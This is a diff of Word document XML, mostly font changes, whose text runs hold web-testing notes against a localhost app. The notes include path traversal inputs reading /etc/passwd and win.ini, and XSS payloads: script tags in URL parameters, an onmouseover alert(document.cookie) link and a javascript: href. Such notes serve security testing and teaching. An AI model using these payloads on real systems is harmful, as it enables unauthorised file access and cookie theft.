+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="28"/>
+            <w:szCs w:val="28"/>
+          </w:rPr>
+          <w:t>http://localhost/%3Cscript%20type=%22text/javascript%22%20src=%22dist/purify.min.js%22%3E%3C/script%3E</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="HTMLPreformatted"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Path:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>login?file</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>=../../../../etc/passwd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -259,194 +1476,739 @@
         <w:pStyle w:val="HTMLPreformatted"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>/login?file=../../../../etc/passwd</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>windows</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>win.ini</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Xss:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>URL:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:hyperlink r:id="rId7" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="28"/>
+            <w:szCs w:val="28"/>
+          </w:rPr>
+          <w:t>http://localhost/login?redirect=%3Cscript%3Ealert(1)%3C/script%3E</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>http://localhost/%3Cscript%20type=%22text/javascript%22%20src=%22dist/purify.min.js%22%3E%3C/script%3E</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>SEARCH:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&lt;a onmouseover="alert(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)"\&gt;xxs link\&lt;/a\&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="36464E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="nt"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="3F6EC6"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>IMG</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="36464E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="err"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="36464E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>"""</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&gt;&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="nt"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="3F6EC6"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>SCRIPT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="nx"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="36464E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>alert</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="s2"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1C7D4D"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>"XSS</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="s2"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1C7D4D"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>)&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="nt"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="3F6EC6"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>SCRIPT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="36464E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
+        </w:rPr>
+        <w:t>"\&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="nt"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="3F6EC6"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="36464E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="na"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>href</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="o"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="s"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1C7D4D"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="s"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1C7D4D"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>javascript:alert</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="s"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1C7D4D"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>(String.fromCharCode(88,83,83))"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="36464E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
+        </w:rPr>
+        <w:t>Click Me!</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="nt"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="3F6EC6"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rStyle w:val="p"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="HTMLPreformatted"/>
         <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-k"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-k"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-k"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pl-k"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="CF222E"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1F2328"/>
-        </w:rPr>
-        <w:t>...</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
